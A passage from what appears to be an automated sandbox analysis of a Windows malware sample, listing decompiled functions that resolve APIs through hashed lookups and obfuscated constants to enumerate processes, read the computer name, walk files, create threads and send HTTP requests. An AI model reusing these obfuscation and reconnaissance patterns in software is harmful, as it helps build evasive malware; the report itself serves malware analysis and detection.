				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E002007A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}

0x00208428
0x0020842b
0x0020842e
0x00208430
0x00208433
0x00208436
0x00208439
0x0020843d
0x0020843e
0x00208443
0x0020844a
0x00208453
0x0020845a
0x00208461
0x00208468
0x0020847c
0x0020847f
0x00208486
0x0020848d
0x00208498
0x0020849b
0x002084a8
0x002084be
0x002084c3

APIs

HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002084BE

Strings

ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib, xrefs: 0020844E

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: HttpRequestSend
String ID: ws Media Center the remote control commands..How do you want to configure your set-top box?Local Library.Searching for shared lib
API String ID: 360639707-4005334235
Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction ID: ca43a457b48dbd7cd644cba6aa2738312290b5682f61ed30727f1534e9a4c244
Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction Fuzzy Hash: 8F1116B180120DFFDF05DF94CD469AEBFB6AB44314F208288F924662A1C3768B249B80

Uniqueness

Uniqueness Score: -1.00%

Function 001FF74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FF74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E001F602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E002007A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}

0x001ff757
0x001ff765
0x001ff76a
0x001ff774
0x001ff782
0x001ff787
0x001ff78f
0x001ff793
0x001ff79a
0x001ff7ac
0x001ff7af
0x001ff7b6
0x001ff7c3
0x001ff7d1
0x001ff7d7

APIs

ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 001FF7D1

Strings

G, xrefs: 001FF7B6

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: G
API String ID: 2681117516-4236931613
Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction ID: 0e8837530ddc04be5ca563ddfc48bebf8066393feb56f8d3f9ff93d2f9752c07
Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction Fuzzy Hash: 61011775901208FBEB04DF94DD4AA9EBFB5EF85314F208188F50866290E7B55B60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001F76F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001F76F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E002007A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}

0x001f76fe
0x001f7701
0x001f7703
0x001f7706
0x001f7707
0x001f7708
0x001f770d
0x001f7714
0x001f771d
0x001f7724
0x001f7730
0x001f7738
0x001f7740
0x001f7747
0x001f774e
0x001f7755
0x001f7764
0x001f7767
0x001f7774
0x001f7780
0x001f7786

APIs

Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 001F7780

Strings

nS8U, xrefs: 001F775F

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FirstProcess32
String ID: nS8U
API String ID: 2623510744-2564412997
Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction ID: 32b5acbf081a796de66c341243aadae0cadb35cc298b7ba57255c06bc6d2c115
Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction Fuzzy Hash: 10018CB5D01208FBEB04DF94D90A9DEBFB5EF40314F208089E8186B251E7B55F249B81

Uniqueness

Uniqueness Score: -1.00%

Function 001F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001F1096

Strings

[, xrefs: 001F103B

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction ID: f83f6239cc42481eb679efaf5e71d5d5f3602f9487418f8f8d18f83b15cf1aba
Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction Fuzzy Hash: 9F016DB6D0130CFBEF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001F602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E002007A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}

0x001f6033
0x001f6036
0x001f6038
0x001f603b
0x001f603c
0x001f603d
0x001f6042
0x001f6049
0x001f6055
0x001f605c
0x001f6063
0x001f606a
0x001f6081
0x001f6084
0x001f608b
0x001f6092
0x001f6099
0x001f60a6
0x001f60b2
0x001f60b8

APIs

GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 001F60B2

Strings

/Fq, xrefs: 001F605C

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ComputerName
String ID: /Fq
API String ID: 3545744682-1299280358
Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction ID: 0b9a3bf8c2ced95f060e758b829362039ec314422665a3978916c4481e6c7425
Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction Fuzzy Hash: E1011AB5C1130CBBDB04EFA4D94A9EEBFB4EF41314F108189E9086B251D7B54B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 001F595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E001F595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E002007A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}

0x001f595d
0x001f595e
0x001f5960
0x001f5963
0x001f5965
0x001f5968
0x001f5969
0x001f596a
0x001f596f
0x001f5979
0x001f5982
0x001f5989
0x001f5990
0x001f5997
0x001f599e
0x001f59a2
0x001f59a9
0x001f59c2
0x001f59ce
0x001f59d4

APIs

FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 001F59CE

Strings

4, xrefs: 001F5997

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindNext
String ID: 4
API String ID: 2029273394-293933855
Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction ID: 7c33ed7a588e43bc6258f26b1b66b7364a32429170c4318a281e2cb01f74539e
Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction Fuzzy Hash: 80014B76D11208BBEB14DFA4C8468DEBE78EF51354F108188F80867251D7B25F249B92

Uniqueness

Uniqueness Score: -1.00%

Function 00204F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00204F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00204f80
0x00204f81
0x00204f82
0x00204f86
0x00204f87
0x00204f8c
0x00204fa5
0x00204fa8
0x00204faf
0x00204fb6
0x00204fc7
0x00204fca
0x00204fd7
0x00204fe2
0x00204fe7

APIs

CloseHandle.KERNEL32(003E66D8), ref: 00204FE2

Strings

{#lm, xrefs: 00204FC2

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction ID: 3baa9677071f580ff9ed1589da305fef3c7bc8fa5d74d7cd9fe7e1eb2b31d20e
Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction Fuzzy Hash: 19F037B081120CFFEB04DFA4D98289EBFBAEB41300F208199E804AB260D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0020375D, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0020375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E001F602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E002007A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}

0x00203764
0x00203769
0x0020376a
0x0020376d
0x0020376e
0x00203771
0x00203774
0x00203775
0x00203778
0x0020377b
0x0020377e
0x00203781
0x00203782
0x00203784
0x00203785
0x0020378a
0x00203794
0x0020379d
0x002037a0
0x002037a3
0x002037aa
0x002037b1
0x002037b8
0x002037bf
0x002037c6
0x002037d2
0x002037da
0x002037e2
0x002037f6
0x0020380a
0x00203810

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0020380A

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction ID: b8e2fe9db2e5226496c7d4195e6d354523b35b2f3f644c0ba9813408411799d8
Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction Fuzzy Hash: AB1129B1802219BBDF55DF95DD098DF7FB9EF4A360F104048F90862160C7B14A64DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001FB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 001FB5FD

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction ID: 485c5e609fe2aec3bc199f0c517ab32974bb55217e71692408e913989f17a245
Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction Fuzzy Hash: 0111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 002036D3, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E002036D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E001F602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E002007A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}

0x002036df
0x002036e1
0x002036e8
0x002036ed
0x002036fc
0x00203701
0x00203702
0x00203709
0x0020370a
0x00203711
0x0020371b
0x00203723
0x0020372f
0x00203736
0x0020373d
0x0020374a
0x00203754
0x0020375c

APIs

ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00203754

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction ID: 260f83aaac6a0123003ac6753be091814d7b36a637c5cd16d7ff3b3d5dc63cf2
Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction Fuzzy Hash: 39019275A01208FBEB04DBA9DC469EFFFB4EF84364F208099EA04A7251D7755F148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F1132, Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001F1132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E001F602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E002007A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}

0x001f1135
0x001f1136
0x001f113a
0x001f113b
0x001f113e
0x001f1141
0x001f1144
0x001f1147
0x001f114a
0x001f114b
0x001f114e
0x001f114f
0x001f1150
0x001f1151
0x001f1156
0x001f116f
0x001f1172
0x001f1179
0x001f1180
0x001f1187
0x001f118e
0x001f1192
0x001f1195
0x001f11a8
0x001f11ba
0x001f11c0

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 001F11BA

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction ID: d6b0653b3674c38c4f2bcefb2bdbb90aa019bdcf490845b03f6df79f79b60242
Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction Fuzzy Hash: 3601277280221DBBCF15DFA5CD49CCFBFB9EF09254F104188FA0962250D2729A20DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0020981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0020981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,001F87F2,0000CAAE,0000510C,AD82F196), ref: 0020989B

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction ID: 1129fbc2d41107b07c5125bba92e75e737e23df9f0a9dadb9c0d9eff1fb701ab
Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction Fuzzy Hash: 92019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00209AC7, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00209AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E002007A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}

0x00209acc
0x00209acf
0x00209ad2
0x00209ad7
0x00209adf
0x00209aed
0x00209af5
0x00209afd
0x00209b01
0x00209b08
0x00209b0f
0x00209b16
0x00209b1d
0x00209b31
0x00209b3f
0x00209b44

APIs

Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00209B3F

Memory Dump Source

Source File: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000D.00000002.2339856494.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2339879613.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction ID: b5543516b4d72e99eeb99cd0098100ccdf80d4abd09c486031e80d53b90ca74f
Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction Fuzzy Hash: 03014BB191020CBFEF04DFA4CC469AEBFB5EF45350F108098F609A62A1D7B25B609B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F7663, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001F7663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E001F602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E002007A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}

0x001f7678
0x001f767d
